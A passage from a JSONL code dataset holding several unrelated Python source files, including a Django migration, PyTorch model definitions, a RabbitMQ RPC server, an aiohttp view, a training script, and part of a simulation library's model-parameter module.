ACK = expectedSeqnum\n sock.send(ACK.to_bytes(1, 'big'))\n if (expectedSeqnum == 0 ):\n expectedSeqnum = 1 \n elif(expectedSeqnum == 1 ):\n expectedSeqnum = 0 \n\n num_bytes += len(data)\n dest.flush()\n return num_bytes \n ","sub_path":"project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":5980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"519214346","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='wp_image',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),\n ('image', models.FileField(upload_to='/img', help_text='The file for the image.', verbose_name='image')),\n ('image_id', models.CharField(blank=True, db_index=True, max_length=255, help_text='Image ID for building urls.', verbose_name='image id')),\n ('publish_date', models.DateTimeField(default=datetime.datetime.now, help_text='When the image was uploaded.', verbose_name='publish date')),\n ('height', models.IntegerField(blank=True, default=0, help_text='The height for the image.', verbose_name='height')),\n ('width', models.IntegerField(blank=True, default=0, help_text='The width for the image.', verbose_name='width')),\n ('album', models.CharField(blank=True, default='', max_length=255, help_text='Album name for this image.', verbose_name='album')),\n ('title', models.CharField(blank=True, default='', max_length=255, help_text='Title for the image.', verbose_name='title')),\n ('description', models.TextField(help_text='Description for this image.', verbose_name='description')),\n ('disabled', models.BooleanField(default=False, help_text='Whether or not this image is listable.', verbose_name='disabled')),\n ('private', models.BooleanField(default=False, help_text='Whether or not this image is private (not listable).', verbose_name='private')),\n ('view_count', models.IntegerField(default=0, help_text='How many times this image has been viewed.', verbose_name='view count')),\n ],\n options={\n 'get_latest_by': 'publish_date',\n 'verbose_name': 'Image',\n 'db_table': 'wp_images',\n 'ordering': ['-publish_date'],\n 'verbose_name_plural': 'Images',\n },\n bases=(models.Model,),\n ),\n ]\n","sub_path":"img/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"191595724","text":"from torch import nn\nimport torch\nfrom torch.nn import functional as F\nfrom boardlaw.heads import scatter_values\n\nclass ReZeroResidual(nn.Linear):\n\n def __init__(self, width):\n super().__init__(width, width)\n nn.init.orthogonal_(self.weight, gain=2**.5)\n self.register_parameter('α', nn.Parameter(torch.zeros(())))\n\n def forward(self, x, *args, **kwargs):\n return x + self.α*F.relu(super().forward(x))\n\nclass FCModel(nn.Module):\n\n def __init__(self, boardsize, width=256, depth=20):\n super().__init__()\n\n blocks = [nn.Linear(2*boardsize**2, width)]\n for _ in range(depth):\n blocks.append(ReZeroResidual(width))\n self.body = nn.Sequential(*blocks) \n\n self.value = nn.Linear(width, 1)\n\n def forward(self, obs, seats):\n obs = obs.flatten(1)\n neck = self.body(obs)\n v = self.value(neck).squeeze(-1)\n return scatter_values(torch.tanh(v), seats)\n\nclass ReZeroConv(nn.Conv2d):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, padding=1, stride=1, kernel_size=3, **kwargs)\n self.register_parameter('α', nn.Parameter(torch.zeros(())))\n\n def forward(self, x, *args, **kwargs):\n return x + self.α*F.relu(super().forward(x))\n\nclass ConvModel(nn.Module):\n\n def __init__(self, boardsize, width, depth=16):\n super().__init__()\n\n layers = [nn.Conv2d(2, width, 3, 1, 1)]\n for l in range(depth):\n layers.append(ReZeroConv(width, width))\n layers.append(nn.Conv2d(width, 1, 3, 1, 1))\n self.layers = nn.ModuleList(layers)\n\n self.value = nn.Linear(boardsize**2, 1)\n\n def forward(self, obs, seats):\n B, boardsize, boardsize, _ = obs.shape\n x = obs.permute(0, 3, 1, 2)\n for l in self.layers:\n x = l(x)\n x = x.reshape(B, -1)\n v = self.value(x.flatten(1)).squeeze(-1)\n return scatter_values(torch.tanh(v), seats)\n\nclass FCConvModel(nn.Module):\n\n def __init__(self, boardsize, width=256, depth=20, conv_width=16):\n super().__init__()\n\n legs = [nn.Conv2d(2, conv_width, 3, 1, 1)]\n for l in range(depth//2):\n legs.append(ReZeroConv(conv_width, conv_width))\n legs.append(nn.Conv2d(conv_width, 4, 3, 1, 1))\n self.legs = nn.ModuleList(legs)\n\n body = [nn.Linear(4*boardsize**2, width)]\n for _ in range(depth//2):\n body.append(ReZeroResidual(width))\n self.body = nn.Sequential(*body) \n\n self.value = nn.Linear(width, 1)\n\n def forward(self, obs, seats):\n x = obs.permute(0, 3, 1, 2)\n for l in self.legs:\n x = F.relu(l(x))\n x = x.flatten(1)\n neck = self.body(x)\n v = self.value(neck).squeeze(-1)\n return scatter_values(torch.tanh(v), seats)\n\n","sub_path":"experiments/architecture/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"93598398","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-.\nimport pika\nimport requests\n\n\nconnection = pika.BlockingConnection(pika.ConnectionParameters(host='localhost'))\nchannel = connection.channel()\nchannel.queue_declare(queue='queue_exist_period')\n\ndef check_period(id_period):\n\n url = \"http://127.0.0.1:8001/uv-domjudge/v1/periods/\"+id_period\n\n response = requests.get(url)\n\n print(\"desde check period\")\n\n return str(response.status_code).encode('utf-8')\n\n\ndef on_request(ch, method, props, body):\n id_period = body.decode('utf-8')\n\n print(\"Get Current period\")\n response = check_period(id_period)\n print(response)\n\n ch.basic_publish(exchange='',\n routing_key=props.reply_to,\n properties=pika.BasicProperties(correlation_id = \\\n props.correlation_id),\n body=response)\n ch.basic_ack(delivery_tag = method.delivery_tag)\n\nchannel.basic_qos(prefetch_count=1)\nchannel.basic_consume(on_request, queue='queue_exist_period')\n\nprint(\" [x] Awaiting RPC requests\")\nchannel.start_consuming()\n\n\n\"\"\"\nfrom server import server_courses\n\"\"\"","sub_path":"server/server_professor_exist_period.py","file_name":"server_professor_exist_period.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"489221623","text":"from bson.json_util import dumps\nfrom aiohttp import web\nfrom admin.models import Quote\n\n\nclass Collection(web.View):\n\n def encode(self, data):\n return dumps(data, indent=4).encode('utf-8')\n\n async def get(self):\n quote = Quote(db=self.request.db, data={})\n all_quotes = await quote.all()\n return web.Response(status=200,\n body=self.encode(\n data={'quotes': all_quotes}),\n content_type='application/json')\n\n async def post(self):\n data = await self.request.post()\n quote = await self.request.db['quotes'].find_one({'text': 'fdvdd'})\n quote = Quote(self.request.db, data)\n result = await quote.create_quote()\n all_quotes = await quote.all()\n return web.Response(status=200,\n body=self.encode(\n data={'quotes': all_quotes}),\n content_type='application/json')","sub_path":"admin/views/quote.py","file_name":"quote.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"293917335","text":"import csv\nimport hashlib\nimport time\nfrom itertools import permutations\nfrom os import fspath\n\nimport numpy as np\nimport pandas as pd\n\nimport rvoldefinitions as rvdef\n\npd.set_option('display.max_columns', None)\n\n\n# helper functions\ndef isduplicate(inp):\n \"\"\"Checks for duplicates for an input list\"\"\"\n dups = set([e for e in inp if inp.count(e) > 1])\n return list(dups)\n\n\ndef generate_onid(onidlist, rvid):\n \"\"\"Checks for duplicates for an input list\"\"\"\n hashcode = int(hashlib.sha256(rvid.encode('utf-8')).hexdigest(), 16) % 100000\n perms = set([''.join(c) for c in permutations(str(hashcode))])\n perms = sorted([int(p) for p in perms], reverse=True)\n ctr = 0\n onid = f'ON{perms[ctr]:05d}'\n # check for any potential duplicates\n while onid in onidlist:\n ctr += 1\n onid = f'ON{perms[ctr]:05d}'\n return onid\n\n\nif __name__ == \"__main__\":\n id_linking_df = rvdef.id_mapping\n\n # reading in CTDB data as a dictionary of dataframes. Each dataframe contains responses to questionnaires.\n # 'SUBJECT_NUMBER' field contains the RVIDs of the participants. \n ctdb_all_df = pd.read_excel(rvdef.filepaths.ctdb_data_dir, skiprows=[1], sheet_name=None)\n onid_mapping = {}\n unique_rvids_in_data = set() # set of unique RVol IDs\n\n # crawl through all ctdb forms to find list of unique RVIDs\n for form, df in ctdb_all_df.items():\n df['participant_id'] = df[' ']\n del df[' ']\n for ind, snum in df['participant_id'].items():\n unique_rvids_in_data.add(snum)\n\n print(f'No. of unique subjects across CTDB questionnaires is {len(unique_rvids_in_data)}')\n unique_rvids_in_id_file = id_linking_df['SUBJECT_NUMBER']\n existing_onids = id_linking_df['open_neuro_id'].tolist()\n\n # gives a list of rvids in ctdb data NOT present in id_linking_file\n no_onids_subjs = np.setdiff1d(list(unique_rvids_in_data), unique_rvids_in_id_file).tolist()\n\n # verifies if there are any duplicate openneuro_ids in the current id_linking_file\n dupes = isduplicate(existing_onids)\n if dupes:\n print(dupes)\n print(f'ALERT! There are duplicates in your id_linking_file. Inspect {id_file} for these IDs {dups} \\\n and find a resolution before proceeding')\n else:\n for ind, rvid in unique_rvids_in_id_file.items():\n onid_mapping[rvid] = id_linking_df.at[ind, 'open_neuro_id']\n\n if no_onids_subjs:\n for rvid in no_onids_subjs:\n onid = generate_onid(existing_onids, rvid)\n existing_onids.append(onid)\n onid_mapping[rvid] = onid\n\n # writing to a csv file\n timestr = time.strftime('%Y%m%d_%H%M%S')\n with open(fspath(rvdef.filepaths.data_dir.joinpath('id_files', 'id_linking_file_' + timestr + '.csv')), 'w',\n newline='') as csvfile:\n header = ['SUBJECT_NUMBER', 'open_neuro_id']\n writer = csv.DictWriter(csvfile, fieldnames=header)\n writer.writeheader()\n for key, value in onid_mapping.items():\n writer.writerow({'SUBJECT_NUMBER': key, 'open_neuro_id': value})\n","sub_path":"phenotype_data_prep_scripts/00_generate_openneuro_ids.py","file_name":"00_generate_openneuro_ids.py","file_ext":"py","file_size_in_byte":3100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"305904589","text":"from datetime import datetime\n\nimport numpy as np\nimport pandas as pd\nimport torch\nfrom torch.utils.data import DataLoader\nfrom torchvision import transforms\n\nfrom src.model.mapsed import MAPSED\nfrom src.model.vae.conv_vae import ConvVAE\nfrom src.utils.calculate_seq_loss import calculate_seq_loss\nfrom src.utils.load_data import load_seq_data, normalize_data\n\n\ndef save_progress(model, train_losses, train_nce, train_recon, train_losses_dicts_mean,\n train_losses_dicts_var, test_losses_dicts_mean, test_losses_dicts_var):\n model_path = '../saved_models/VAN/mapsed-No-Contrast.torch'\n torch.save(model.state_dict(), model_path)\n\n metric_dict = {'training loss': train_losses,\n 'training nce': train_nce,\n 'training recon': train_recon}\n\n for me in metrics:\n metric_dict['train {}(mean)'.format(me)] = np.stack(train_losses_dicts_mean[me])\n metric_dict['train {}(std)'.format(me)] = np.stack(train_losses_dicts_var[me])\n metric_dict['test {}(mean)'.format(me)] = np.stack(test_losses_dicts_mean[me])\n metric_dict['test {}(std)'.format(me)] = np.stack(test_losses_dicts_var[me])\n\n df_result = pd.DataFrame(metric_dict)\n df_result.index.name = 'epochs'\n df_result.index = df_result.index + 1\n\n df_result.to_csv('../saved_models/VAN/mapsed-No-Contrast.csv')\n\n\ndevice = torch.device('cuda')\n\nseq_train, seq_test, _ = load_seq_data('VAN')\nmean = seq_train.mean(axis=(0,1,3,4))\nseq_train = normalize_data(seq_train, mean)\nseq_test = normalize_data(seq_test, mean)\n\n\ndataloader_train = DataLoader(seq_train, 32, True, drop_last=True)\ndataloader_test = DataLoader(seq_test, 32, True, drop_last=True)\nepochs = 51\ntrain_losses = np.zeros(epochs)\ntrain_nce = np.zeros(epochs)\ntrain_recon = np.zeros(epochs)\nuse_same_input = False\n# torch.manual_seed(2020)\n\nif use_same_input:\n # only one data, check if the model can overfit\n # data = torch.stack([torch.tensor(seq_train[0]) for _ in range(128)])np.max(1, in_channels // 8)\n data = torch.tensor(seq_train[:32])\nvae = ConvVAE(input_channels=4).to(device)\nvae.load_state_dict(torch.load('../saved_models/VAN/VAE-VAN.torch'))\nm = 5\nn = 3\n\nmodel = MAPSED(vae, latent_shape=(2, 5, 5), m=m, n=n, lambda_contrast=0, contrast='inner').to(device)\noptimizer = torch.optim.Adam(filter(lambda p: p.requires_grad, model.parameters()), lr=1e-3)\n# scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=5, gamma=0.9)\nscheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, patience=10, factor=0.1, verbose=True)\npytorch_total_params = sum(p.numel() for p in model.parameters() if p.requires_grad)\nprint(\"total # of trainable parameters: {}\".format(pytorch_total_params))\n\n\n\nmetrics = ['MSE', 'MAE']\ntrain_losses_dicts_mean = {me: [] for me in metrics}\ntrain_losses_dicts_var = {me: [] for me in metrics}\ntest_losses_dicts_mean = {me: [] for me in metrics}\ntest_losses_dicts_var = {me: [] for me in metrics}\n\nx_augs = []\nfor epoch in range(epochs):\n model.train()\n model.vae.eval()\n model.training = True\n running_train_loss = 0\n running_nce = 0\n running_recon = 0\n # running_diff = 0\n validate_loss = {me: [] for me in metrics}\n test_loss = {me: [] for me in metrics}\n for idx, seq in enumerate(dataloader_train):\n if use_same_input:\n seq = data\n # print(\"updating with data [{}/{}]\".format(idx+1, len(dataloader_train)))\n with torch.no_grad():\n angle = np.random.choice([0, 90, 180, 270])\n #training transform\n train_tf = transforms.Compose([\n transforms.RandomHorizontalFlip(),\n transforms.RandomRotation([angle, angle])])\n\n seq = seq.cuda().float()\n seq = train_tf(seq.view(-1,10,10)).view(seq.shape)\n\n indices = torch.randperm(m)\n x_aug = seq[:, :m].detach()[:, indices]\n optimizer.zero_grad()\n x = seq[:, :m]\n gt = seq[:, m:]\n y_pred, loss, nce_channel, recon_loss = model(x, gt_seq=gt, x_aug=x_aug)\n loss.backward()\n optimizer.step()\n running_train_loss += loss.data\n running_nce += nce_channel\n running_recon += recon_loss\n train_losses[epoch] = running_train_loss / len(dataloader_train)\n train_nce[epoch] = running_nce / len(dataloader_train)\n train_recon[epoch] = running_recon / len(dataloader_train)\n\n with torch.no_grad():\n for me in metrics:\n validate_loss[me].append(calculate_seq_loss(y_pred, gt, me))\n\n model.eval()\n model.training = False\n with torch.no_grad():\n for _, seq in enumerate(dataloader_test):\n seq = seq.cuda().float()\n x = seq[:, :m]\n gt = seq[:, m:]\n y_pred, loss, _, _ = model(x, gt)\n for me in metrics:\n test_loss[me].append(calculate_seq_loss(y_pred, gt, me))\n for me in metrics:\n train_losses_dicts_mean[me].append(np.mean(validate_loss[me]))\n train_losses_dicts_var[me].append(np.std(validate_loss[me]))\n test_losses_dicts_mean[me].append(np.mean(test_loss[me]))\n test_losses_dicts_var[me].append(np.std(test_loss[me]))\n\n if epoch % 10 == 0:\n print(\"Time:{}, Running epoch [{}/{}], training loss:{}, channel nce:{}, recon:{}, train MSE loss:{},\\\n test MSE loss:{}\".format(\n datetime.now(),\n epoch + 1, epochs,\n train_losses[epoch],\n train_nce[epoch],\n train_recon[epoch],\n train_losses_dicts_mean['MSE'][epoch],\n test_losses_dicts_mean['MSE'][epoch]))\n if epoch % 30 == 0:\n save_progress(model, train_losses[:epoch + 1], train_nce[:epoch + 1],\n train_recon[:epoch + 1], train_losses_dicts_mean, train_losses_dicts_var,\n test_losses_dicts_mean, test_losses_dicts_var)\n scheduler.step(train_losses[epoch])\n # scheduler.step()\nsave_progress(model, train_losses, train_nce, train_recon, train_losses_dicts_mean,\n train_losses_dicts_var, test_losses_dicts_mean, test_losses_dicts_var)\n\nprint(\"DONE\")\n","sub_path":"src/train_mapsed_VAN.py","file_name":"train_mapsed_VAN.py","file_ext":"py","file_size_in_byte":6160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"336635848","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jan 17 2017\n\nCopyright 2017-2021 Alexandre René\n\nTODO\n----\n\n- At present, things like ``h for h in model.statehists`` will use __eq__\n for the ``in`` check, which for histories creates a dict and compares.\n Iterables like `statehists` should be something like a ``set``, such that\n this check then just compares identity / hashes.\n- Have one dictionary/SimpleNamespace storing all compilation variables.\n See comment under `class Model`\n\"\"\"\nfrom __future__ import annotations\n\nimport sys\nimport abc\nimport copy\nfrom collections import namedtuple, OrderedDict, ChainMap, defaultdict\nfrom collections.abc import (\n Sequence as Sequence_, Iterable, Callable as Callable_, Generator as Generator_)\nfrom warnings import warn, filterwarnings, catch_warnings\nimport logging\nimport inspect\nfrom inspect import isclass\nfrom itertools import chain, combinations\nfrom functools import partial, wraps\nimport textwrap\n\nimport numpy as np\nimport scipy as sp\n\nimport pydantic\nfrom pydantic import BaseModel, PrivateAttr, validator, root_validator\nfrom pydantic.typing import AnyCallable\nfrom pydantic.fields import ModelField\nfrom pydantic.utils import lenient_issubclass\nfrom typing import (\n Any, Optional, Union, ClassVar, Type, Tuple, Sequence, List, Dict, Set,\n Generator, Callable as Callable, NamedTuple)\nfrom types import SimpleNamespace\nfrom dataclasses import dataclass\nfrom parameters import ParameterSet\nfrom tabulate import tabulate\n\nimport theano_shim as shim\nimport mackelab_toolbox as mtb\nimport mackelab_toolbox.utils as utils\nimport mackelab_toolbox.theano\nimport mackelab_toolbox.typing\nimport mackelab_toolbox.iotools\nfrom mackelab_toolbox.theano import GraphCache, CompiledGraphCache\nfrom mackelab_toolbox.utils import class_or_instance_method\n\nimport sinn\nimport sinn.config as config\nimport sinn.common as com\nfrom sinn.axis import DiscretizedAxis, AbstractAxisIndex\nfrom sinn.histories import (\n History, TimeAxis, AutoHist, HistoryUpdateFunction, Series, Spiketrain)\nfrom sinn.kernels import Kernel\nfrom sinn.diskcache import diskcache\n\n# Import into namespace, so user code doesn't need to import utils\nfrom sinn.utils.pydantic import initializer, add_exclude_mask\n\nlogger = logging.getLogger(__name__)\n\n_models = {}\nregistered_models = _models.keys()\n # I don't really like this, but it works. Ideally it would be some kind\n # of read-only property of the module.\n # Registering models allows us to save the model name within a parameter\n # file, and write a function which can build the correct model\n # automatically based on only on that parameter file.\n # NOTE: sinn-full uses a much nicer mechanism of TaggedCollections\n # which mostly makes _models (and the functions below) obsolete.\n\nexpensive_asserts = True\n\nfailed_build_msg = (\n \"Failed to build the symbolic update. Make sure that the \"\n \"model's definition of State is correct: it should include \"\n \"enough histories to fully define the model's state and \"\n \"allow forward integration. If you are sure the problem is \"\n \"not your model, you may need to workaround the issue by \"\n \"defining a `symbolic_update` in your model class. \"\n \"Automatic construction of symbolic updates is still work in \"\n \"progress and not always possible.\")\n\ndef register_model(model, modelname=None):\n \"\"\"\n Register a subclass of Model.\n Typically this is called from the module which implements the subclass.\n If `modelname` is unspecified, `model`'s class name is used.\n \"\"\"\n global _models\n assert(isclass(model))\n if modelname is None:\n modelname = model.__name__\n assert(isinstance(modelname, str))\n _models[modelname] = model\n\ndef is_registered(modelname):\n \"\"\"Returns True if a model is registered with this name.\"\"\"\n global _models\n return modelname in _models\n\ndef get_model(modelname, *args, **kwargs):\n \"\"\"Retrieves the model associated with the model name. Same arguments as dict.get().\"\"\"\n global _models\n return _models.get(modelname, *args, **kwargs)\n\n# def nesteddictwalk(d, separator='.', terminate=()):\n# \"\"\"\n# Walk a nested dict structure, using a generator.\n# Values associated to keys matching one of the values in `terminate` are not\n# recursed into, even if they are dictionaries.\n#\n# Composite keys are created by joining each key to the key of the parent dict\n# using `separator`.\n#\n# .. Note:: Copied from the parameters package (parameters.__init__.py), to\n# add the `terminate` argument.\n# \"\"\"\n# # Used in Model.__init__ to delay creation of update functions until all\n# # histories are created.\n# if isinstance(terminate, str):\n# terminate = [terminate]\n# for key1, value1 in d.items():\n# if isinstance(value1, dict) and key1 not in terminate:\n# for key2, value2 in nesteddictwalk(value1, separator, terminate=terminate): # recurse into subdict\n# yield \"%s%s%s\" % (key1, separator, key2), value2\n# else:\n# yield key1, value1\n\n# Parameters\n\n# TODO: A NumericModelParams type, automatically constructed with the same\n# fields as a model's ModelParams, but using non-symbolic types.\n# Replace all occurrences of IndexableNamespace with NumericModelParams\nfrom mackelab_toolbox.typing import IndexableNamespace\n\nclass ModelParamsMetaclass(pydantic.main.ModelMetaclass):\n # NB: Simply assigning to type_dict in a __init_subclass__ method doesn't\n # work with composite models\n @property\n def type_dict(cls):\n return dict(cls._nested_types())\n\nclass ModelParams(BaseModel, metaclass=ModelParamsMetaclass):\n \"Use the `.info()` method for a summary of expected parameters.\"\n type_dict: ClassVar[Dict[str,Type]]\n\n class Config:\n json_encoders = mtb.typing.json_encoders\n\n # Almost all models will use NumPy arrays for some of their parameters,\n # so it seems justified to include the deserializer in the base class\n @root_validator(pre=True)\n def deserialize_arrays(cls, values):\n for k, v in values.items():\n if mtb.typing.json_like(v, \"Array\"):\n values[k] = mtb.typing.Array.validate(v)\n return values\n\n def __init__(self, *args, **kwargs):\n # Reconstruct hierarchies from dotted parameter names\n kwargs = ParameterSet(kwargs)\n super().__init__(*args, **kwargs)\n\n @classmethod\n def _nested_types(cls):\n for θnm, field in cls.__fields__.items():\n if lenient_issubclass(field.type_, ModelParams):\n for subθnm, subT in field.type_._nested_types():\n yield f\"{θnm}.{subθnm}\", subT\n else:\n yield θnm, field.type_\n\n def get_values(self, borrow: bool=False): # -> NumericModelParams\n \"\"\"\n Helper method which calls `get_value` on each parameter.\n Returns a copy of the ModelParams, where each shared variable has\n been replaced by its current numeric value.\n\n Parameters\n ----------\n borrow:\n False: (Default) Force a copy of the data.\n True: Attempt to avoid a copy.\n Normally this is simply passed to the shared var's `get_value` method.\n \"\"\"\n d = {k: v.get_values(borrow=borrow) if isinstance(v, ModelParams) else\n v.get_value(borrow=borrow) if shim.isshared(v) else\n v if borrow else getattr(v, 'copy', lambda: copy.copy(v))()\n for k,v in self}\n return IndexableNamespace(**d)\n\n def _set_values(self, values: ModelParams, # TODO -> NumericModelParams\n must_set_all_params: bool=False,\n must_not_set_other_params: bool=True,\n borrow: bool=False):\n \"\"\"\n TODO: The annotation is not quite correct. Values should be Params-like,\n but contain no symbolic variables.\n (Typically, ModelParams subclasses _enforce_ certain params to be\n shared vars)\n Helper method which calls `set_value` on each parameter.\n For non-shared variables, the value is simply updated.\n Values are updated in place.\n\n .. Caution:: In almost all situations, one should call\n `model.update_params` rather than `_set_values` directly, as this will\n ensure that submodel parameters remain in sync.\n\n Parameters\n ----------\n values: Dictionary of values to set\n must_set_all_params:\n Whether the model params must be a subset of `values`.\n must_not_set_other_params:\n Whether `values` must be a subset of the model params.\n borrow:\n False: (Default) Force a copy of the data.\n True: Attempt to avoid a copy.\n Normally this is simply passed to the shared var's `get_value` method.\n \"\"\"\n if isinstance(values, dict):\n values_dict = values\n elif isinstance(values, SimpleNamespace):\n values_dict = values.__dict__\n elif isinstance(values, type(self)):\n values_dict = {k: v for k,v in values}\n else:\n # `self` is always a subclass, and we want `values` to be an instance of that subclass\n raise TypeError(f\"{type(self)}._set_values: `values` must be an \"\n f\"instance of {type(self)}, but is rather of type \"\n f\"{type(values)}.\")\n if must_set_all_params and not set(self.__fields__) <= set(values_dict):\n raise ValueError(\"The following parameters are missing: \"\n f\"{set(self.__fields__) - set(values_dict)}\")\n if must_not_set_other_params and not set(values_dict) <= set(self.__fields__):\n raise ValueError(f\"{type(self)} does not recognize the following parameters: \"\n f\"{sorted(set(values_dict) - set(self.__fields__))}.\\n\"\n f\"Expected parameters are: {sorted(set(self.__fields__))}.\")\n # Build hierarchies, in case `values` uses dotted keys\n values_dict = ParameterSet(values_dict)\n for k, v in values_dict.items():\n # Special path for nested models\n if isinstance(v, (dict, SimpleNamespace)):\n subΘ = getattr(self, k)\n assert isinstance(subΘ, ModelParams)\n subΘ._set_values(v, borrow=borrow,\n must_not_set_other_params=must_not_set_other_params,\n must_set_all_params=must_set_all_params)\n # Normal path\n else:\n self_v = getattr(self, k)\n if shim.isshared(self_v):\n self_v.set_value(v, borrow=borrow)\n else:\n if shim.is_graph_object(v):\n raise TypeError(\n f\"Parameter values provided to {type(self).__qualname__} \"\n \"must either be shared variables or plain Python \"\n \"or NumPy values. Theano expressions are not \"\n f\"supported.\\nReceived: {v}.\")\n if not borrow:\n v = getattr(v, 'copy', lambda: copy.copy(v))()\n setattr(self, k, v)\n\n @staticmethod\n def _param_desc(field: ModelField):\n internal_name = (f\"stored as '{field.name}'\" if field.name != field.alias\n else \"\")\n optional = \"optional\" if not field.required else \"\"\n default = f\"default: {repr(field.default)}\" if field.default is not None else \"\"\n extra = \", \".join(s for s in (internal_name, optional, default) if s)\n if extra:\n extra = f\" ({extra})\"\n return field.alias, \": \" + field._type_display(), extra\n\n # DEVNOTE: There’s a bit of redundancy here with Model’s `summarize` method\n # Whether it makes sense to combine them is currently unclear to me\n @classmethod\n def info(cls, level: int=1, print: bool=True) -> Union[None, str]:\n \"\"\"\n Display summary information for this set of parameters.\n :param:level: Controls the amount of information to display.\n Level 0: Only display class name (similar to ``str(cls)``)\n Level 1 (default): Display the list of parameters, along with their\n type, default value and aliased name (if applicable)\n :param:print: Whether to print the result (default; returns `None`)\n or to return it as a string\n\n \"\"\"\n import builtins\n text = cls.__qualname__\n if level > 0:\n param_list = tabulate(\n [cls._param_desc(field) for field in cls.__fields__.values()],\n tablefmt='plain')\n text += \"\\n\" + textwrap.indent(param_list, \" \")\n if print:\n builtins.print(text)\n else:\n return text\n\nclass SubmodelParams(ModelParams):\n \"\"\"\n Class used as a placeholder for parameters of a submodel of unknown type.\n\n This performs no parameter validation (since it does not know the expected\n parameters). It simply assumes that all provided values are valid, and\n provides the same interface as `ModelParams`.\n\n Typically, when a `Model` is instantiated which contains submodels, their\n `SubmodelParams` are automatically replaced by the appropriate `ModelParams`.\n\n .. Note:: For consistency, `SubmodelParams` always returns its parameters\n with parameter names in lexicographical order.\n\n .. Caution:: Support for generic submodels is still at the proof-of-concept\n stage. While the goal is eventually to treat a submodel type as a true generic\n type, at present submodels are just typed as `Model`, and updating the\n Parameters with the submodel's Parameters classes is done during model\n instantiation (instead of during *class creating*, as could be done with\n a generic type). This also means that an *instance's* `Parameters` class\n is distinct from the *class'* `Parameters` class.\n\n\n Example usage::\n\n >>> from sinn.models import Model, SubmodelParams\n >>>\n >>> class MyModel(Model):\n >>> class Parameters:\n >>> sub: SubmodelParams\n >>> sub: Model\n >>>\n >>> class MySubmodel(Model):\n >>> class Parameters:\n >>> a: int\n >>> b: float\n >>>\n >>> subΘ = MySubmodelParams(a=1, b=3.)\n >>> submodel = MySubmodel(..., params=subΘ)\n >>> model = MyModel(..., sub=submodel, params={'submodel': subΘ})\n \"\"\"\n # TODO: If we support true generic submodels, we may not need to assign\n # to the instance's `self.Parameters`. In that case, we can remove the\n # exclusion of \"Parameters\" in `dict()`.\n class Config:\n extra = 'allow'\n # DEVNOTE: The order of non-field attributes (those allowed by\n # extra = 'allow') is undefined. Even when attributes are added in the\n # same order, they may be returned in different orders when iterating.\n # This is why we define __iter__ and dict() below.\n def __iter__(self):\n values = {k: v for k,v in super().__iter__()}\n for k in sorted(values):\n yield k, values[k]\n def dict(self, **kwargs):\n d = super().dict(**kwargs)\n return {k: d[k] for k in sorted(d)}\n def _set_values(self, values,\n must_set_all_params=False,\n must_not_set_other_params=False,\n borrow=False):\n \"\"\"\n Wrapper for `ModelParams._set_values` which always sets\n `must_not_set_other_params` and `must_set_all_params` to False.\n Since a `SubmodelParams` is a placeholder, it does not know the expected\n parameters and thus cannot validate that they match those provided.\n \"\"\"\n return super()._set_values(\n values, must_set_all_params=False, must_not_set_other_params=False, borrow=borrow)\n\n # Override the Pydantic default, which fails because when it doesn't find attributes in __fields__\n def __repr_args__(self) -> 'ReprArgs':\n return [(k, v) for k, v in self.__dict__.items()\n if getattr(self.__fields__.get(k), 'field_info.repr', True)]\n\nModelParams.update_forward_refs()\nSubmodelParams.update_forward_refs()\n\n# Model decorators\n\n## updatefunction decorator\n\n# PendingUpdateFunction = namedtuple('PendingUpdateFunction',\n# ['hist_nm', 'inputs', 'upd_fn'])\n@dataclass\nclass PendingFunction:\n hist_nm: str\n inputs : List[str]\n fn : Callable\n def __call__(self, model, k):\n return self.fn(model, k)\n@dataclass\nclass PendingUpdateFunction(PendingFunction):\n pass\n# @dataclass\n# class PendingDerivativeFunction(PendingFunction):\n# hist_nm: Tuple[str]\n\n# If `f` is an update function, then x[k+1] = f(k+1)\ndef updatefunction(hist_nm: str, inputs: List[str]):\n \"\"\"\n Decorator. Attaches the following function to the specified history,\n once the model is initialized.\n \"\"\"\n if not isinstance(hist_nm, str) or not isinstance(inputs, (list, tuple)):\n raise ValueError(\"updatefunction decorator must be used as \\n\"\n \" @updatefunction('hist_nm', inputs=['hist1', hist2'])\\n\"\n \" def hist_update(self, tidx):\\n\"\" …\")\n def dec(upd_fn):\n return PendingUpdateFunction(hist_nm, inputs, upd_fn)\n return dec\n\n# TODO: Automatic translation to an update function\n# If `f` is a derivative, then x[k+1] = x[k] + f(k)*Δt\ndef derivative(hist_nm: Union[str, Tuple[str]], inputs: List[str]):\n \"\"\"\n Decorator. Indicates that the following function ``f`` is the derivative of\n the specified history `hist_nm`. When the model is initialized, the\n corresponding update function (i.e. ``h[t] = h[t-1] + f(t)*Δt``) will be\n attached to `hist_nm`.\n\n .. warning:: This decorator still WIP and highly experimental. At present\n it just adds it to the '_derivatives' dictionary.\n\n Planned:\n - Construct `updatefunction` from a `derivative` using Euler scheme.\n - Support for different integration schemes. Explicit schemes which\n do not require evaluations at intermediate points should be trivial to\n implement (they are just a different update equation to Euler). Other\n schemes may require more work, or need to limit themselves to special cases\n 